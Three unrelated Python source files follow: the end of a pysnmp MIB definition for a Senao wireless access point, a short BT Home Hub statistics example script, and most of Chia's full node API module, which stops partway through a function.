if mibBuilder.loadTexts: entSNMPCommunityEntry.setStatus('current')
entSNMPCommunityIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 6, 3, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2))).setMaxAccess("readonly")
if mibBuilder.loadTexts: entSNMPCommunityIndex.setStatus('current')
entSNMPCommunityName = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 6, 3, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 32))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entSNMPCommunityName.setStatus('current')
entSNMPCommunityType = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 6, 3, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("read", 1), ("write", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: entSNMPCommunityType.setStatus('current')
entSNMPCommunityValid = MibTableColumn((1, 3, 6, 1, 4, 1, 14125, 100, 6, 3, 1, 4), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: entSNMPCommunityValid.setStatus('current')
entSNMPTrap = MibIdentifier((1, 3, 6, 1, 4, 1, 14125, 100, 6, 4))
entTrapStatus = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 6, 4, 1), TruthValue()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entTrapStatus.setStatus('mandatory')
entTrapVer = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 6, 4, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3))).clone(namedValues=NamedValues(("all", 0), ("v1", 1), ("v2c", 2), ("v3", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entTrapVer.setStatus('mandatory')
entTrapReceiverIPAddress = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 6, 4, 3), IpAddress()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entTrapReceiverIPAddress.setStatus('mandatory')
entTrapReceiverCommunityName = MibScalar((1, 3, 6, 1, 4, 1, 14125, 100, 6, 4, 4), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: entTrapReceiverCommunityName.setStatus('mandatory')
entTraps = MibIdentifier((1, 3, 6, 1, 4, 1, 14125, 100, 20))
entSystemTraps = MibIdentifier((1, 3, 6, 1, 4, 1, 14125, 100, 20, 1))
entWanTraps = MibIdentifier((1, 3, 6, 1, 4, 1, 14125, 100, 20, 2))
entSystemTrapsReboot = NotificationType((1, 3, 6, 1, 4, 1, 14125, 100, 20, 1, 1))
if mibBuilder.loadTexts: entSystemTrapsReboot.setStatus('current')
entSystemTrapsRestoreToDefault = NotificationType((1, 3, 6, 1, 4, 1, 14125, 100, 20, 1, 2))
if mibBuilder.loadTexts: entSystemTrapsRestoreToDefault.setStatus('current')
entSystemTrapsReloadModules = NotificationType((1, 3, 6, 1, 4, 1, 14125, 100, 20, 1, 3))
if mibBuilder.loadTexts: entSystemTrapsReloadModules.setStatus('current')
entWanTrapsLinkDisconnect = NotificationType((1, 3, 6, 1, 4, 1, 14125, 100, 20, 2, 1)).setObjects(("SENAO-ENTERPRISE-INDOOR-AP-CB-MIB", "ifIndex"))
if mibBuilder.loadTexts: entWanTrapsLinkDisconnect.setStatus('current')
entWanTrapsLinkRecover = NotificationType((1, 3, 6, 1, 4, 1, 14125, 100, 20, 2, 2)).setObjects(("SENAO-ENTERPRISE-INDOOR-AP-CB-MIB", "ifIndex"))
if mibBuilder.loadTexts: entWanTrapsLinkRecover.setStatus('current')
mibBuilder.exportSymbols("SENAO-ENTERPRISE-INDOOR-AP-CB-MIB", entIPLeaseTime=entIPLeaseTime, entWlanWepKey3Value=entWlanWepKey3Value, entKenelVersion=entKenelVersion, entMacFilteringValid=entMacFilteringValid, entSystemTraps=entSystemTraps, entWlanESSIDInfoIndex=entWlanESSIDInfoIndex, entSNMPCommunityEntry=entSNMPCommunityEntry, entRouterEnable=entRouterEnable, entWlanESSIDInfoEntry=entWlanESSIDInfoEntry, entResetToDefault=entResetToDefault, entMacAddress=entMacAddress, entWlanClientListInfoTable=entWlanClientListInfoTable, entLanMacFilteringEnable=entLanMacFilteringEnable, entBeaconInterval=entBeaconInterval, entWanTrapsLinkDisconnect=entWanTrapsLinkDisconnect, ent802dot1xInfoTable=ent802dot1xInfoTable, entApplyModules=entApplyModules, entCLRx=entCLRx, entTraps=entTraps, entIPPoolEnd=entIPPoolEnd, entRadio=entRadio, entWlanAuthenticationType=entWlanAuthenticationType, entAPMode=entAPMode, entSNMPCommunityName=entSNMPCommunityName, entRADIUSServerPort=entRADIUSServerPort, entSNMPCommunityTable=entSNMPCommunityTable, entLanMacFilterEntry=entLanMacFilterEntry, entLanMacFilterTable=entLanMacFilterTable, indoorWirelessDevice=indoorWirelessDevice, entFragmentationThreshold=entFragmentationThreshold, entWanTrapsLinkRecover=entWanTrapsLinkRecover, entCLInterface=entCLInterface, entTrapReceiverCommunityName=entTrapReceiverCommunityName, entWlanWepKeyID=entWlanWepKeyID, entSNMPCommunityValid=entSNMPCommunityValid, entWlanCommonInfo=entWlanCommonInfo, entReset=entReset, entTxPower=entTxPower, entWlanClientListInfoEntry=entWlanClientListInfoEntry, entTrapVer=entTrapVer, entWlanWepInfoTable=entWlanWepInfoTable, entCLIdleTime=entCLIdleTime, senao=senao, entWAN=entWAN, entLanMacFilteringMode=entLanMacFilteringMode, entChannelBandwidth=entChannelBandwidth, ent802dot1xInfoEntry=ent802dot1xInfoEntry, PYSNMP_MODULE_ID=senao, entHwVersion=entHwVersion, entWlanWPAInfoTable=entWlanWPAInfoTable, entCLMAC=entCLMAC, entWMM=entWMM, entSystemTrapsReloadModules=entSystemTrapsReloadModules, entWlan802dot1xEnable=entWlan802dot1xEnable, entWlanWepKey4Value=entWlanWepKey4Value, entSystemTrapsReboot=entSystemTrapsReboot, entAppVersion=entAppVersion, entSystemTrapsRestoreToDefault=entSystemTrapsRestoreToDefault, entTrapReceiverIPAddress=entTrapReceiverIPAddress, entWlan802dot1xESSIDIndex=entWlan802dot1xESSIDIndex, entWlanWepInfoEntry=entWlanWepInfoEntry, entBroadcastESSID=entBroadcastESSID, entOpMode=entOpMode, entSysUpTime=entSysUpTime, entSysModel=entSysModel, entESSID=entESSID, entCLInfoIndex=entCLInfoIndex, entCTSProtection=entCTSProtection, entPreambleType=entPreambleType, entWlanWepKey2Value=entWlanWepKey2Value, entSN=entSN, entWlanWepKey1Value=entWlanWepKey1Value, entRADIUSServerPassword=entRADIUSServerPassword, entSystem=entSystem, entMacFilter=entMacFilter, entPassword=entPassword, entIPPoolStart=entIPPoolStart, entRTSThreshold=entRTSThreshold, entWlan=entWlan, entSNMPVerType=entSNMPVerType, entChannel=entChannel, entCLSignal=entCLSignal, entDHCPEnable=entDHCPEnable, entSTPEnable=entSTPEnable, entWlanWPAESSIDIndex=entWlanWPAESSIDIndex, entTrapStatus=entTrapStatus, entRADIUSServerIPAddress=entRADIUSServerIPAddress, entWlanESSIDInfoTable=entWlanESSIDInfoTable, entSNMPTrap=entSNMPTrap, entSNMPStatus=entSNMPStatus, entSNMP=entSNMP, entWlanWPAInfoEntry=entWlanWPAInfoEntry, entLANIP=entLANIP, entBand=entBand, entPresharedKey=entPresharedKey, entDataRate=entDataRate, entNDataRate=entNDataRate, entCLTx=entCLTx, entLANSubnetMask=entLANSubnetMask, entWlanESSIDIndex=entWlanESSIDIndex, entSysMode=entSysMode, entLAN=entLAN, entEncryption=entEncryption, entSNMPCommunityIndex=entSNMPCommunityIndex, entSNMPCommunityType=entSNMPCommunityType, entMacAddressIndex=entMacAddressIndex, entDTIMPeriod=entDTIMPeriod, entWanTraps=entWanTraps, entESSIDNum=entESSIDNum, entCLConnectedTime=entCLConnectedTime)
| 119.018018 | 3,826 | 0.756983 | [
"Apache-2.0"
] | agustinhenze/mibs.snmplabs.com | pysnmp/SENAO-ENTERPRISE-INDOOR-AP-CB-MIB.py | 26,422 | Python |
import bthomehub
client = bthomehub.BtHomeClient('192.168.0.254')
client.authenticate()
values = client.get_values()
print('DownstreamRate = ' + str(float(values["Device/DSL/Channels/Channel[@uid='1']/DownstreamCurrRate"]) / 1000))
print('UpstreamRate = ' + str(float(values["Device/DSL/Channels/Channel[@uid='1']/UpstreamCurrRate"]) / 1000))
print('System UpTime = ' + str(values["Device/DeviceInfo/UpTime"]))
print('BytesSent = ' + str(float(values["Device/IP/Interfaces/Interface[@uid='3']/Stats/BytesSent"]) / 1000000))
print('BytesRecieved = ' + str(float(values["Device/IP/Interfaces/Interface[@uid='3']/Stats/BytesReceived"]) / 1000000))
print('Network UpTime = ' + str(values["Device/IP/Interfaces/Interface[@uid='3']/LastChange"]))
| 46.625 | 120 | 0.72118 | [
"Unlicense"
] | abaitken/bthomehub_client | example.py | 746 | Python |
import asyncio
import dataclasses
import time
import traceback
from secrets import token_bytes
from typing import Dict, List, Optional, Tuple, Set
from blspy import AugSchemeMPL, G2Element
from chiabip158 import PyBIP158
import chia.server.ws_connection as ws
from chia.consensus.block_creation import create_unfinished_block
from chia.consensus.block_record import BlockRecord
from chia.consensus.pot_iterations import calculate_ip_iters, calculate_iterations_quality, calculate_sp_iters
from chia.full_node.bundle_tools import best_solution_generator_from_template, simple_solution_generator
from chia.full_node.full_node import FullNode
from chia.full_node.mempool_check_conditions import get_puzzle_and_solution_for_coin
from chia.full_node.signage_point import SignagePoint
from chia.protocols import farmer_protocol, full_node_protocol, introducer_protocol, timelord_protocol, wallet_protocol
from chia.protocols.full_node_protocol import RejectBlock, RejectBlocks
from chia.protocols.protocol_message_types import ProtocolMessageTypes
from chia.protocols.wallet_protocol import (
PuzzleSolutionResponse,
RejectHeaderBlocks,
RejectHeaderRequest,
CoinState,
RespondSESInfo,
)
from chia.server.outbound_message import Message, make_msg
from chia.types.blockchain_format.coin import Coin, hash_coin_list
from chia.types.blockchain_format.pool_target import PoolTarget
from chia.types.blockchain_format.program import Program
from chia.types.blockchain_format.sized_bytes import bytes32
from chia.types.blockchain_format.sub_epoch_summary import SubEpochSummary
from chia.types.coin_record import CoinRecord
from chia.types.end_of_slot_bundle import EndOfSubSlotBundle
from chia.types.full_block import FullBlock
from chia.types.generator_types import BlockGenerator
from chia.types.mempool_inclusion_status import MempoolInclusionStatus
from chia.types.mempool_item import MempoolItem
from chia.types.peer_info import PeerInfo
from chia.types.transaction_queue_entry import TransactionQueueEntry
from chia.types.unfinished_block import UnfinishedBlock
from chia.util.api_decorators import api_request, peer_required, bytes_required, execute_task, reply_type
from chia.util.generator_tools import get_block_header
from chia.util.hash import std_hash
from chia.util.ints import uint8, uint32, uint64, uint128
from chia.util.merkle_set import MerkleSet
class FullNodeAPI:
full_node: FullNode
def __init__(self, full_node) -> None:
self.full_node = full_node
@property
def server(self):
return self.full_node.server
@property
def log(self):
return self.full_node.log
@property
def api_ready(self):
return self.full_node.initialized
@peer_required
@api_request
@reply_type([ProtocolMessageTypes.respond_peers])
async def request_peers(self, _request: full_node_protocol.RequestPeers, peer: ws.WSChiaConnection):
if peer.peer_server_port is None:
return None
peer_info = PeerInfo(peer.peer_host, peer.peer_server_port)
if self.full_node.full_node_peers is not None:
msg = await self.full_node.full_node_peers.request_peers(peer_info)
return msg
@peer_required
@api_request
async def respond_peers(
self, request: full_node_protocol.RespondPeers, peer: ws.WSChiaConnection
) -> Optional[Message]:
self.log.debug(f"Received {len(request.peer_list)} peers")
if self.full_node.full_node_peers is not None:
await self.full_node.full_node_peers.respond_peers(request, peer.get_peer_info(), True)
return None
@peer_required
@api_request
async def respond_peers_introducer(
self, request: introducer_protocol.RespondPeersIntroducer, peer: ws.WSChiaConnection
) -> Optional[Message]:
self.log.debug(f"Received {len(request.peer_list)} peers from introducer")
if self.full_node.full_node_peers is not None:
await self.full_node.full_node_peers.respond_peers(request, peer.get_peer_info(), False)
await peer.close()
return None
@execute_task
@peer_required
@api_request
async def new_peak(self, request: full_node_protocol.NewPeak, peer: ws.WSChiaConnection) -> Optional[Message]:
"""
A peer notifies us that they have added a new peak to their blockchain. If we don't have it,
we can ask for it.
"""
# this semaphore limits the number of tasks that can call new_peak() at
# the same time, since it can be expensive
waiter_count = len(self.full_node.new_peak_sem._waiters)
if waiter_count > 0:
self.full_node.log.debug(f"new_peak Waiters: {waiter_count}")
if waiter_count > 20:
return None
async with self.full_node.new_peak_sem:
return await self.full_node.new_peak(request, peer)
@peer_required
@api_request
async def new_transaction(
self, transaction: full_node_protocol.NewTransaction, peer: ws.WSChiaConnection
) -> Optional[Message]:
"""
A peer notifies us of a new transaction.
Requests a full transaction if we haven't seen it previously, and if the fees are enough.
"""
# Ignore if syncing
if self.full_node.sync_store.get_sync_mode():
return None
if not (await self.full_node.synced()):
return None
# Ignore if already seen
if self.full_node.mempool_manager.seen(transaction.transaction_id):
return None
if self.full_node.mempool_manager.is_fee_enough(transaction.fees, transaction.cost):
# If there's current pending request just add this peer to the set of peers that have this tx
if transaction.transaction_id in self.full_node.full_node_store.pending_tx_request:
if transaction.transaction_id in self.full_node.full_node_store.peers_with_tx:
current_set = self.full_node.full_node_store.peers_with_tx[transaction.transaction_id]
if peer.peer_node_id in current_set:
return None
current_set.add(peer.peer_node_id)
return None
else:
new_set = set()
new_set.add(peer.peer_node_id)
self.full_node.full_node_store.peers_with_tx[transaction.transaction_id] = new_set
return None
self.full_node.full_node_store.pending_tx_request[transaction.transaction_id] = peer.peer_node_id
new_set = set()
new_set.add(peer.peer_node_id)
self.full_node.full_node_store.peers_with_tx[transaction.transaction_id] = new_set
async def tx_request_and_timeout(full_node: FullNode, transaction_id, task_id):
counter = 0
try:
while True:
# Limit to asking to a few peers, it's possible that this tx got included on chain already
# Highly unlikely that the peers that advertised a tx don't respond to a request. Also, if we
# drop some transactions, we don't want to refetch too many times
if counter == 5:
break
if transaction_id not in full_node.full_node_store.peers_with_tx:
break
peers_with_tx: Set = full_node.full_node_store.peers_with_tx[transaction_id]
if len(peers_with_tx) == 0:
break
peer_id = peers_with_tx.pop()
assert full_node.server is not None
if peer_id not in full_node.server.all_connections:
continue
peer = full_node.server.all_connections[peer_id]
request_tx = full_node_protocol.RequestTransaction(transaction.transaction_id)
msg = make_msg(ProtocolMessageTypes.request_transaction, request_tx)
await peer.send_message(msg)
await asyncio.sleep(5)
counter += 1
if full_node.mempool_manager.seen(transaction_id):
break
except asyncio.CancelledError:
pass
finally:
# Always Cleanup
if transaction_id in full_node.full_node_store.peers_with_tx:
full_node.full_node_store.peers_with_tx.pop(transaction_id)
if transaction_id in full_node.full_node_store.pending_tx_request:
full_node.full_node_store.pending_tx_request.pop(transaction_id)
if task_id in full_node.full_node_store.tx_fetch_tasks:
full_node.full_node_store.tx_fetch_tasks.pop(task_id)
task_id: bytes32 = bytes32(token_bytes(32))
fetch_task = asyncio.create_task(
tx_request_and_timeout(self.full_node, transaction.transaction_id, task_id)
)
self.full_node.full_node_store.tx_fetch_tasks[task_id] = fetch_task
return None
return None
@api_request
@reply_type([ProtocolMessageTypes.respond_transaction])
async def request_transaction(self, request: full_node_protocol.RequestTransaction) -> Optional[Message]:
"""Peer has requested a full transaction from us."""
# Ignore if syncing
if self.full_node.sync_store.get_sync_mode():
return None
spend_bundle = self.full_node.mempool_manager.get_spendbundle(request.transaction_id)
if spend_bundle is None:
return None
transaction = full_node_protocol.RespondTransaction(spend_bundle)
msg = make_msg(ProtocolMessageTypes.respond_transaction, transaction)
return msg
@peer_required
@api_request
@bytes_required
async def respond_transaction(
self,
tx: full_node_protocol.RespondTransaction,
peer: ws.WSChiaConnection,
tx_bytes: bytes = b"",
test: bool = False,
) -> Optional[Message]:
"""
Receives a full transaction from peer.
If tx is added to mempool, send tx_id to others. (new_transaction)
"""
assert tx_bytes != b""
spend_name = std_hash(tx_bytes)
if spend_name in self.full_node.full_node_store.pending_tx_request:
self.full_node.full_node_store.pending_tx_request.pop(spend_name)
if spend_name in self.full_node.full_node_store.peers_with_tx:
self.full_node.full_node_store.peers_with_tx.pop(spend_name)
if self.full_node.transaction_queue.qsize() % 100 == 0 and not self.full_node.transaction_queue.empty():
self.full_node.log.debug(f"respond_transaction Waiters: {self.full_node.transaction_queue.qsize()}")
if self.full_node.transaction_queue.full():
self.full_node.dropped_tx.add(spend_name)
return None
# Higher fee means priority is a smaller number, which means it will be handled earlier
await self.full_node.transaction_queue.put(
(0, TransactionQueueEntry(tx.transaction, tx_bytes, spend_name, peer, test))
)
return None
@api_request
@reply_type([ProtocolMessageTypes.respond_proof_of_weight])
async def request_proof_of_weight(self, request: full_node_protocol.RequestProofOfWeight) -> Optional[Message]:
if self.full_node.weight_proof_handler is None:
return None
if not self.full_node.blockchain.contains_block(request.tip):
self.log.error(f"got weight proof request for unknown peak {request.tip}")
return None
if request.tip in self.full_node.pow_creation:
event = self.full_node.pow_creation[request.tip]
await event.wait()
wp = await self.full_node.weight_proof_handler.get_proof_of_weight(request.tip)
else:
event = asyncio.Event()
self.full_node.pow_creation[request.tip] = event
wp = await self.full_node.weight_proof_handler.get_proof_of_weight(request.tip)
event.set()
tips = list(self.full_node.pow_creation.keys())
if len(tips) > 4:
# Remove old from cache
for i in range(0, 4):
self.full_node.pow_creation.pop(tips[i])
if wp is None:
self.log.error(f"failed creating weight proof for peak {request.tip}")
return None
# Serialization of wp is slow
if (
self.full_node.full_node_store.serialized_wp_message_tip is not None
and self.full_node.full_node_store.serialized_wp_message_tip == request.tip
):
return self.full_node.full_node_store.serialized_wp_message
message = make_msg(
ProtocolMessageTypes.respond_proof_of_weight, full_node_protocol.RespondProofOfWeight(wp, request.tip)
)
self.full_node.full_node_store.serialized_wp_message_tip = request.tip
self.full_node.full_node_store.serialized_wp_message = message
return message
@api_request
async def respond_proof_of_weight(self, request: full_node_protocol.RespondProofOfWeight) -> Optional[Message]:
self.log.warning("Received proof of weight too late.")
return None
@api_request
@reply_type([ProtocolMessageTypes.respond_block, ProtocolMessageTypes.reject_block])
async def request_block(self, request: full_node_protocol.RequestBlock) -> Optional[Message]:
if not self.full_node.blockchain.contains_height(request.height):
reject = RejectBlock(request.height)
msg = make_msg(ProtocolMessageTypes.reject_block, reject)
return msg
header_hash: Optional[bytes32] = self.full_node.blockchain.height_to_hash(request.height)
if header_hash is None:
return make_msg(ProtocolMessageTypes.reject_block, RejectBlock(request.height))
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(header_hash)
if block is not None:
if not request.include_transaction_block and block.transactions_generator is not None:
block = dataclasses.replace(block, transactions_generator=None)
return make_msg(ProtocolMessageTypes.respond_block, full_node_protocol.RespondBlock(block))
return make_msg(ProtocolMessageTypes.reject_block, RejectBlock(request.height))
@api_request
@reply_type([ProtocolMessageTypes.respond_blocks, ProtocolMessageTypes.reject_blocks])
async def request_blocks(self, request: full_node_protocol.RequestBlocks) -> Optional[Message]:
if request.end_height < request.start_height or request.end_height - request.start_height > 32:
reject = RejectBlocks(request.start_height, request.end_height)
msg: Message = make_msg(ProtocolMessageTypes.reject_blocks, reject)
return msg
for i in range(request.start_height, request.end_height + 1):
if not self.full_node.blockchain.contains_height(uint32(i)):
reject = RejectBlocks(request.start_height, request.end_height)
msg = make_msg(ProtocolMessageTypes.reject_blocks, reject)
return msg
if not request.include_transaction_block:
blocks: List[FullBlock] = []
for i in range(request.start_height, request.end_height + 1):
header_hash_i: Optional[bytes32] = self.full_node.blockchain.height_to_hash(uint32(i))
if header_hash_i is None:
reject = RejectBlocks(request.start_height, request.end_height)
return make_msg(ProtocolMessageTypes.reject_blocks, reject)
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(header_hash_i)
if block is None:
reject = RejectBlocks(request.start_height, request.end_height)
return make_msg(ProtocolMessageTypes.reject_blocks, reject)
block = dataclasses.replace(block, transactions_generator=None)
blocks.append(block)
msg = make_msg(
ProtocolMessageTypes.respond_blocks,
full_node_protocol.RespondBlocks(request.start_height, request.end_height, blocks),
)
else:
blocks_bytes: List[bytes] = []
for i in range(request.start_height, request.end_height + 1):
header_hash_i = self.full_node.blockchain.height_to_hash(uint32(i))
if header_hash_i is None:
reject = RejectBlocks(request.start_height, request.end_height)
return make_msg(ProtocolMessageTypes.reject_blocks, reject)
block_bytes: Optional[bytes] = await self.full_node.block_store.get_full_block_bytes(header_hash_i)
if block_bytes is None:
reject = RejectBlocks(request.start_height, request.end_height)
msg = make_msg(ProtocolMessageTypes.reject_blocks, reject)
return msg
blocks_bytes.append(block_bytes)
respond_blocks_manually_streamed: bytes = (
bytes(uint32(request.start_height))
+ bytes(uint32(request.end_height))
+ len(blocks_bytes).to_bytes(4, "big", signed=False)
)
for block_bytes in blocks_bytes:
respond_blocks_manually_streamed += block_bytes
msg = make_msg(ProtocolMessageTypes.respond_blocks, respond_blocks_manually_streamed)
return msg
@api_request
async def reject_block(self, request: full_node_protocol.RejectBlock):
self.log.debug(f"reject_block {request.height}")
@api_request
async def reject_blocks(self, request: full_node_protocol.RejectBlocks):
self.log.debug(f"reject_blocks {request.start_height} {request.end_height}")
@api_request
async def respond_blocks(self, request: full_node_protocol.RespondBlocks) -> None:
self.log.warning("Received unsolicited/late blocks")
return None
@api_request
@peer_required
async def respond_block(
self,
respond_block: full_node_protocol.RespondBlock,
peer: ws.WSChiaConnection,
) -> Optional[Message]:
"""
Receive a full block from a peer full node (or ourselves).
"""
self.log.warning(f"Received unsolicited/late block from peer {peer.get_peer_logging()}")
return None
@api_request
async def new_unfinished_block(
self, new_unfinished_block: full_node_protocol.NewUnfinishedBlock
) -> Optional[Message]:
# Ignore if syncing
if self.full_node.sync_store.get_sync_mode():
return None
block_hash = new_unfinished_block.unfinished_reward_hash
if self.full_node.full_node_store.get_unfinished_block(block_hash) is not None:
return None
# This prevents us from downloading the same block from many peers
if block_hash in self.full_node.full_node_store.requesting_unfinished_blocks:
return None
msg = make_msg(
ProtocolMessageTypes.request_unfinished_block,
full_node_protocol.RequestUnfinishedBlock(block_hash),
)
self.full_node.full_node_store.requesting_unfinished_blocks.add(block_hash)
# However, we want to eventually download from other peers, if this peer does not respond
# Todo: keep track of who it was
async def eventually_clear():
await asyncio.sleep(5)
if block_hash in self.full_node.full_node_store.requesting_unfinished_blocks:
self.full_node.full_node_store.requesting_unfinished_blocks.remove(block_hash)
asyncio.create_task(eventually_clear())
return msg
@api_request
@reply_type([ProtocolMessageTypes.respond_unfinished_block])
async def request_unfinished_block(
self, request_unfinished_block: full_node_protocol.RequestUnfinishedBlock
) -> Optional[Message]:
unfinished_block: Optional[UnfinishedBlock] = self.full_node.full_node_store.get_unfinished_block(
request_unfinished_block.unfinished_reward_hash
)
if unfinished_block is not None:
msg = make_msg(
ProtocolMessageTypes.respond_unfinished_block,
full_node_protocol.RespondUnfinishedBlock(unfinished_block),
)
return msg
return None
@peer_required
@api_request
@bytes_required
async def respond_unfinished_block(
self,
respond_unfinished_block: full_node_protocol.RespondUnfinishedBlock,
peer: ws.WSChiaConnection,
respond_unfinished_block_bytes: bytes = b"",
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
await self.full_node.respond_unfinished_block(
respond_unfinished_block, peer, block_bytes=respond_unfinished_block_bytes
)
return None
@api_request
@peer_required
async def new_signage_point_or_end_of_sub_slot(
self, new_sp: full_node_protocol.NewSignagePointOrEndOfSubSlot, peer: ws.WSChiaConnection
) -> Optional[Message]:
# Ignore if syncing
if self.full_node.sync_store.get_sync_mode():
return None
if (
self.full_node.full_node_store.get_signage_point_by_index(
new_sp.challenge_hash,
new_sp.index_from_challenge,
new_sp.last_rc_infusion,
)
is not None
):
return None
if self.full_node.full_node_store.have_newer_signage_point(
new_sp.challenge_hash, new_sp.index_from_challenge, new_sp.last_rc_infusion
):
return None
if new_sp.index_from_challenge == 0 and new_sp.prev_challenge_hash is not None:
if self.full_node.full_node_store.get_sub_slot(new_sp.prev_challenge_hash) is None:
collected_eos = []
challenge_hash_to_request = new_sp.challenge_hash
last_rc = new_sp.last_rc_infusion
num_non_empty_sub_slots_seen = 0
for _ in range(30):
if num_non_empty_sub_slots_seen >= 3:
self.log.debug("Diverged from peer. Don't have the same blocks")
return None
# If this is an end of sub slot, and we don't have the prev, request the prev instead
# We want to catch up to the latest slot so we can receive signage points
full_node_request = full_node_protocol.RequestSignagePointOrEndOfSubSlot(
challenge_hash_to_request, uint8(0), last_rc
)
response = await peer.request_signage_point_or_end_of_sub_slot(full_node_request, timeout=10)
if not isinstance(response, full_node_protocol.RespondEndOfSubSlot):
self.full_node.log.debug(f"Invalid response for slot {response}")
return None
collected_eos.append(response)
if (
self.full_node.full_node_store.get_sub_slot(
response.end_of_slot_bundle.challenge_chain.challenge_chain_end_of_slot_vdf.challenge
)
is not None
or response.end_of_slot_bundle.challenge_chain.challenge_chain_end_of_slot_vdf.challenge
== self.full_node.constants.GENESIS_CHALLENGE
):
for eos in reversed(collected_eos):
await self.respond_end_of_sub_slot(eos, peer)
return None
if (
response.end_of_slot_bundle.challenge_chain.challenge_chain_end_of_slot_vdf.number_of_iterations
!= response.end_of_slot_bundle.reward_chain.end_of_slot_vdf.number_of_iterations
):
num_non_empty_sub_slots_seen += 1
challenge_hash_to_request = (
response.end_of_slot_bundle.challenge_chain.challenge_chain_end_of_slot_vdf.challenge
)
last_rc = response.end_of_slot_bundle.reward_chain.end_of_slot_vdf.challenge
self.full_node.log.warning("Failed to catch up in sub-slots")
return None
if new_sp.index_from_challenge > 0:
if (
new_sp.challenge_hash != self.full_node.constants.GENESIS_CHALLENGE
and self.full_node.full_node_store.get_sub_slot(new_sp.challenge_hash) is None
):
# If this is a normal signage point,, and we don't have the end of sub slot, request the end of sub slot
full_node_request = full_node_protocol.RequestSignagePointOrEndOfSubSlot(
new_sp.challenge_hash, uint8(0), new_sp.last_rc_infusion
)
return make_msg(ProtocolMessageTypes.request_signage_point_or_end_of_sub_slot, full_node_request)
# Otherwise (we have the prev or the end of sub slot), request it normally
full_node_request = full_node_protocol.RequestSignagePointOrEndOfSubSlot(
new_sp.challenge_hash, new_sp.index_from_challenge, new_sp.last_rc_infusion
)
return make_msg(ProtocolMessageTypes.request_signage_point_or_end_of_sub_slot, full_node_request)
@api_request
@reply_type([ProtocolMessageTypes.respond_signage_point, ProtocolMessageTypes.respond_end_of_sub_slot])
async def request_signage_point_or_end_of_sub_slot(
self, request: full_node_protocol.RequestSignagePointOrEndOfSubSlot
) -> Optional[Message]:
if request.index_from_challenge == 0:
sub_slot: Optional[Tuple[EndOfSubSlotBundle, int, uint128]] = self.full_node.full_node_store.get_sub_slot(
request.challenge_hash
)
if sub_slot is not None:
return make_msg(
ProtocolMessageTypes.respond_end_of_sub_slot,
full_node_protocol.RespondEndOfSubSlot(sub_slot[0]),
)
else:
if self.full_node.full_node_store.get_sub_slot(request.challenge_hash) is None:
if request.challenge_hash != self.full_node.constants.GENESIS_CHALLENGE:
self.log.info(f"Don't have challenge hash {request.challenge_hash}")
sp: Optional[SignagePoint] = self.full_node.full_node_store.get_signage_point_by_index(
request.challenge_hash,
request.index_from_challenge,
request.last_rc_infusion,
)
if sp is not None:
assert (
sp.cc_vdf is not None
and sp.cc_proof is not None
and sp.rc_vdf is not None
and sp.rc_proof is not None
)
full_node_response = full_node_protocol.RespondSignagePoint(
request.index_from_challenge,
sp.cc_vdf,
sp.cc_proof,
sp.rc_vdf,
sp.rc_proof,
)
return make_msg(ProtocolMessageTypes.respond_signage_point, full_node_response)
else:
self.log.info(f"Don't have signage point {request}")
return None
@peer_required
@api_request
async def respond_signage_point(
self, request: full_node_protocol.RespondSignagePoint, peer: ws.WSChiaConnection
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
async with self.full_node.timelord_lock:
# Already have signage point
if self.full_node.full_node_store.have_newer_signage_point(
request.challenge_chain_vdf.challenge,
request.index_from_challenge,
request.reward_chain_vdf.challenge,
):
return None
existing_sp = self.full_node.full_node_store.get_signage_point(
request.challenge_chain_vdf.output.get_hash()
)
if existing_sp is not None and existing_sp.rc_vdf == request.reward_chain_vdf:
return None
peak = self.full_node.blockchain.get_peak()
if peak is not None and peak.height > self.full_node.constants.MAX_SUB_SLOT_BLOCKS:
next_sub_slot_iters = self.full_node.blockchain.get_next_slot_iters(peak.header_hash, True)
sub_slots_for_peak = await self.full_node.blockchain.get_sp_and_ip_sub_slots(peak.header_hash)
assert sub_slots_for_peak is not None
ip_sub_slot: Optional[EndOfSubSlotBundle] = sub_slots_for_peak[1]
else:
sub_slot_iters = self.full_node.constants.SUB_SLOT_ITERS_STARTING
next_sub_slot_iters = sub_slot_iters
ip_sub_slot = None
added = self.full_node.full_node_store.new_signage_point(
request.index_from_challenge,
self.full_node.blockchain,
self.full_node.blockchain.get_peak(),
next_sub_slot_iters,
SignagePoint(
request.challenge_chain_vdf,
request.challenge_chain_proof,
request.reward_chain_vdf,
request.reward_chain_proof,
),
)
if added:
await self.full_node.signage_point_post_processing(request, peer, ip_sub_slot)
else:
self.log.debug(
f"Signage point {request.index_from_challenge} not added, CC challenge: "
f"{request.challenge_chain_vdf.challenge}, RC challenge: {request.reward_chain_vdf.challenge}"
)
return None
@peer_required
@api_request
async def respond_end_of_sub_slot(
self, request: full_node_protocol.RespondEndOfSubSlot, peer: ws.WSChiaConnection
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
msg, _ = await self.full_node.respond_end_of_sub_slot(request, peer)
return msg
@peer_required
@api_request
async def request_mempool_transactions(
self,
request: full_node_protocol.RequestMempoolTransactions,
peer: ws.WSChiaConnection,
) -> Optional[Message]:
received_filter = PyBIP158(bytearray(request.filter))
items: List[MempoolItem] = await self.full_node.mempool_manager.get_items_not_in_filter(received_filter)
